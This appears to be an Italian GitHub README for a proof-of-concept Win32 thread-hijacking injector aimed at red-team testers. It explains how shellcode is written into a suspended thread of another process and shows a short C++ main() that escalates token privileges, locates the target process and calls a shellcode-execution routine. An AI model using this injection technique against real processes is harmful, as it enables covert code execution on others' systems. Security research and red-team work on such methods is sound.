
PoC Hijacking dell'esecuzione del thread per iniezione di codice Win32
Il programma utilizza Thread Hijacking per iniettare shellcode nativo in un'applicazione Win32 standard. Avevo 15 anni quando l'ho creato - per favore ignora il codice scadente.
Ho sviluppato questo piccolo progetto per continuare le mie esperienze con diversi metodi di code injection e per consentire ai professionisti della sicurezza RedTeam di utilizzare questo metodo come un modo unico per eseguire test di penetrazione software. Con Thread hijacking, permette al programma hijacker.exe di sospendere un thread all'interno del programma target.exe, permettendoci di scrivere shellcode in quel thread target, e successivamente essere eseguito (tramite; WriteProcessMemory(), SetThreadContext(), ResumeThread(), CreateThread()).

int main()
{
System sys;
Interceptor incp;
Exception exp;
sys.returnVersionState();
if (sys.returnPrivilegeEscalationState())
{
std::cout << "Token Privileges Adjusted\n";
}
if (DWORD m_procId = incp.FindWin32ProcessId((PCHAR)m_win32ProcessName))
{
incp.ExecuteWin32Shellcode(m_procId);
}
system("PAUSE");
return 0;
}
https://capec.mitre.org/data/definitions/30.html